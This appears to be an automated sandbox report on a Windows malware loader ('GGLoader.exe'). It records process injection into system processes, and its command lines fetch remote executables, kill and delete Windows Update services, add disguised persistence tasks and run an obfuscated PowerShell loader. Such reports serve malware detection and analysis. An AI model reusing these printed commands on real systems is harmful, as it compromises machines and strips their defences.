Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 226B1810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 208F5FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2505E560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C51E3F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1C08C180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A4014E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A401510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5FC570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WerFault.exe base: 27CE7AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 87C0000 value: 4D
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Thread register set: target process: 916
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 8168
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Memory written: C:\Windows\System32\dialer.exe base: 1002B9010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 6DFA038010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 87C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17AABF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1600D650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 23FD1160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B9A6A80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 13713CB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 226B1810000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 208F5FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2505E560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C51E3F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1C08C180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A4014E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A401510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5FC570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WerFault.exe base: 27CE7AB0000
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe"
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagcacgb4acmapgbtahqayqbyahqalqbqahiabwbjaguacwbzacaacabvahcazqbyahmaaablagwabaagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiaataeeacgbnahuabqblag4adabmagkacwb0acaaigbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajag4adqbzacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccatgbvacaavgbpahiadab1ageabaagae0ayqbjaggaaqbuagualwbtaguacgb2aguacgagagkacwagageababsag8adwblagqaiqagafqacgb5acaacgb1ag4abgbpag4azwagag8abgagageaiabkagkazgbmaguacgblag4adaagagqazqb2agkaywblaceajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajahcaawbracmapga7aciaowa8acmazqbmahiaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbmahaazwajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbuahoaaaajad4aiaataeyabwbyagmazqagadwaiwbhaheazaajad4aowaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqauaeqabwb3ag4ababvageazabgagkabablacgajwboahqadabwahmaogavac8aygbpahqaygb1agmaawblahqalgbvahiazwavaduaoqa0adaaagbnadkaoaazadqalwbnagyamwa0adqamwbmadmalwbyageadwavadaayqbkagyayqblagyanabmadganaa3ageamqa3aguayqa0aguanabmadyanqa2agqaywbkadganqbladcangayadkamwa3adgamablagqalwbeac4azqb4aguajwasacaapaajahaaagb4acmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmadgbjahkaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmaeqbjahkaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccatabpagmazqbuahmazqbhaguadaauaguaeablaccakqapadwaiwbiagcaawajad4aowagacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaanaggadab0ahaacwa6ac8alwbiagkadabiahuaywbraguadaauag8acgbnac8acgblagmaaablageadabza
g8acgbnac8acgblagmaaablageadabzagqaaqbyaguaywb0ac8acgbhahcalwawadaazqbiadiazaawagianaazadyanqa5adeazgbjaguamqaxaduamwbiageaywbhadcangayaduamaa5aguanwa2adiazgayagmazqa0ac8aqwbmafaalgblahgazqanacwaiaa8acmacwbiagqaiwa+acaakabkag8aaqbuac0auabhahqaaaagadwaiwboaheadqajad4aiaatafaayqb0aggaiaakaguabgb2adoavablag0acaagadwaiwbrahcacwajad4aiaataemaaabpagwazabqageadaboacaajwbmagkaywbdaggazqbjagsalgblahgazqanackakqa8acmaawbpahgaiwa+adsaiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqauaeqabwb3ag4ababvageazabgagkabablacgajwboahqadabwahmaogavac8aygbpahqaygb1agmaawblahqalgbvahiazwavahiazqbjaggazqbhahqacwbvahiazwavahiazqbjaggazqbhahqacwbkagkacgblagmadaavahiayqb3ac8amaawaguaygayagqamabiadqamwa2aduaoqaxagyaywbladeamqa1admaygbhagmayqa3adyamga1adaaoqbladcangayagyamgbjaguanaavaeqazqb2ag0aaqbuac4azqb4aguajwasacaapaajagqadqbxacmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmaaaboahqaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmadqbzahiaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccatabpagmauwblag4azaauaguaeablaccakqapadwaiwboahcab
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-type -assemblyname system.windows.forms;<#nus#>[system.windows.forms.messagebox]::show('no virtual machine/server is allowed! try running on a different device!','','ok','error')<#wkk#>;
Source: unknown Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ncotqmia#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe "function local:nglbonfbsunr{param([outputtype([type])][parameter(position=0)][type[]]$qtvyipwnfcficq,[parameter(position=1)][type]$hhlnovedyw)$dpttuehyisd=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+[char](102)+''+[char](108)+''+[char](101)+''+[char](99)+''+'t'+''+[char](101)+''+'d'+''+[char](68)+'e'+[char](108)+''+'e'+''+[char](103)+'a'+'t'+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+[char](77)+'em'+[char](111)+''+[char](114)+''+[char](121)+'m'+'o'+''+[char](100)+'u'+[char](108)+'e',$false).definetype(''+[char](77)+'yd'+'e'+'l'+[char](101)+''+'g'+'at'+'e'+''+'t'+''+[char](121)+''+'p'+''+[char](101)+'',''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+''+[char](44)+'p'+[char](117)+''+'b'+''+[char](108)+'ic'+[char](44)+''+[char](83)+''+[char](101)+'ale'+[char](100)+''+[char](44)+''+[char](65)+''+'n'+''+[char](115)+'i'+'c'+''+'l'+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+''+'a'+''+[char](117)+''+[char](116)+'o'+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$dpttuehyisd.defineconstructor(''+[char](82)+''+'t'+''+'s'+''+[char](112)+''+[char](101)+''+'c'+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+''+'m'+'e,'+[char](72)+'ide'+'b'+'y'+'s'+''+'i'+''+[char](103)+''+','+'p'+[char](117)+''+'b'+'l'+'i'+''+[char](99)+'',[reflection.callingconventions]::standard,$qtvyipwnfcficq).setimplementationflags(''+[char](82)+''+[char](117)+'nt'+[char](105)+'m'+[char](101)+''+[char](44)+''+[char](77)+''+'a'+'n'+[char](97)+''+[char](103)+'e'+[char](100)+'');$dpttuehyisd.definemethod('i'+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+'e'+'',''+[char](80)+''+[char](117)+''+[char](98)+'l'+'i'+''+'c'+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+'e'+[char](66)+'y'+'s'+''+[char](105)+'g'+[char](44)+'n'+'e'+'w'+[char](83)+''+[char](108)+''+[char](111)+''+'t'+''+[char](44)+''+[char](86)+''+[char](105)+''+'r'+''+[char](116)+''+'u'+''+[char](97)+''+'l'+'',$hhlnovedyw,$qtvyipwnfcficq).setimplementationflags('r'+[char](117)+''+[char](110)+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+'a'+''+'n'+''+'a'+''+[char](103)+''+[char](101)+''+'d'+'');write-output $dpttuehyisd.createtype();}$fxvcjurjeeuct=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+''+[char](115)+''+'t'+''+[char](101)+'m'+'.'+''+[char](100)+''+[char](108)+''+'l'+'')}).gettype('m'+'i'+''+[char](99)+''+[char](114)+''+[char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'w'+''+[char](105)+''+'n'+''+[char](51)+''+'2'+''+[char](46)+''+'u'+'n'+[char](115)+''+[char](97)+''+[char](102)+''+[char](101)+'f'+'x'+''+[char](118)+'c'+[char](106)+''+'u'+''+[char](
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-type -assemblyname system.windows.forms;<#nus#>[system.windows.forms.messagebox]::show('no virtual machine/server is allowed! try running on a different device!','','ok','error')<#wkk#>;
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ncotqmia#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000000140001C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 42_2_0000000140001C64
Source: dwm.exe, 0000002E.00000002.2994797055.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002E.00000000.2235418179.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5815 cpuid 6_2_007A5815
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: EnumSystemLocalesW, 6_2_007BD13B
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetLocaleInfoW, 6_2_007B51E1
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: EnumSystemLocalesW, 6_2_007BD186
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: EnumSystemLocalesW, 6_2_007BD221
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_007BD2AC
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetLocaleInfoW, 6_2_007BD4FF
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_007BD628
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetLocaleInfoW, 6_2_007BD72E
